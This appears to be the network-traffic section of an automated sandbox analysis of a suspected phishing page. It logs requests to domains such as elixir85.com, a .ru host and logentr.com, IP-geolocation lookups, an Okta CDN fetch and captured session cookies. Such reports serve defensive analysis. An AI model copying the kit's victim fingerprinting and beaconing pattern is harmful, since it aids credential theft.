Source: global traffic HTTP traffic detected: GET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /8.46.123.33/json/ HTTP/1.1Host: ipapi.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 HTTP/1.1Host: ysh.logentr.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: link.mail.beehiiv.com
Source: global traffic DNS traffic detected: DNS query: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev
Source: global traffic DNS traffic detected: DNS query: rfwai.elixir85.com
Source: global traffic DNS traffic detected: DNS query: zichd.6gniu68.ru
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: ipapi.co
Source: global traffic DNS traffic detected: DNS query: ysh.logentr.com
Source: unknown HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 03 Jul 2024 19:06:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 21409Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xHDPp4JIf6W5%2BDk0JsMWxwf7EwYmvp%2FYfbOr7%2ForBSz4LD77PlTvEMshqmRD6ohVVxxfRe8HG5jHbgbHKm%2Binhk4xnpT%2B8ekopSjxsuZl%2F4g0quhwFoJyeMwEn9OQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1102Server: cloudflareCF-RAY: 89d927a72a525e68-EWR
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:55 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: eu1EpEkCcqNgzurIy/LhGA==$64OnncWAQwSUOL04r7Wvmg==Server: cloudflareCF-RAY: 89d927d27c700dc7-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:06:58 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 1iHssQp0AWE2OCmwUtIp1A==$lhC7awhe3i0YGt5cGUyv9A==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d927e3ba687d18-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:15 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: 7j8SxhPmuMHMx8J+6Gd81Q==$KlvkNg1hiJ+R8XxXLOnDeA==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 89d9284ad85f19c3-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EWmHgFM%2FadqMbdMRJF5E01thRBkArEv%2BWqKGsGQUOQoepA5pgD4pXaaFqd15SCRFoQor2uItdtvKyH7heUKe1a2c8RgqR7VwKqAmyiZam5mOInpxEsbJWEBbwKayuA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d928543ff042c0-EWR
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnZBzm1b6kSL9lqE%2F%2FoZ0pOyhMWKqchZo8tcJ%2BeJq9d2pgvVQseXZwPn2oi3yp%2B2QDObLFK%2BqoTchyOC6vpobHLtid4QzI4pA1acAkxvcDHR22vgftHFCW0qJVYLVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 89d92881d9c617a9-EWR
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 19:07:28 GMTContent-Type: application/json; charset=utf-8Content-Length: 170Connection: closevary: OriginCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wkAmjOUGRbvL6MCev0sPu%2FTqpkU3bIJZuCXTCtKqlD5KCE%2F9SkifA4RX1GTYyqLzBZe1eWPtpN5RS5muGDTXphX%2F1bnrJhfKBypszqo8Pa%2BWQRNaZMEIK5oCa9tGcnNUCs4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d9289fda660f55-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_114.3.dr String found in binary or memory: http://github.com/fent/randexp.js/raw/master/LICENSE
Source: chromecache_128.3.dr, chromecache_102.3.dr, chromecache_118.3.dr String found in binary or memory: https://RfWAi.elixir85.com/RfWAi/#X
Source: chromecache_87.3.dr String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_87.3.dr String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_87.3.dr String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_87.3.dr String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_87.3.dr String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_114.3.dr String found in binary or memory: https://github.com/fent)
Source: chromecache_87.3.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_87.3.dr String found in binary or memory: https://recaptcha.net
Source: chromecache_87.3.dr String found in binary or memory: https://support.google.com/recaptcha
Source: chromecache_87.3.dr String found in binary or memory: https://support.google.com/recaptcha#6262736
Source: chromecache_87.3.dr String found in binary or memory: https://support.google.com/recaptcha/#6175971
Source: chromecache_87.3.dr String found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
Source: chromecache_87.3.dr String found in binary or memory: https://www.apache.org/licenses/
Source: chromecache_112.3.dr, chromecache_87.3.dr String found in binary or memory: https://www.google.com/recaptcha/api2/
Source: chromecache_87.3.dr String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
Source: chromecache_112.3.dr String found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
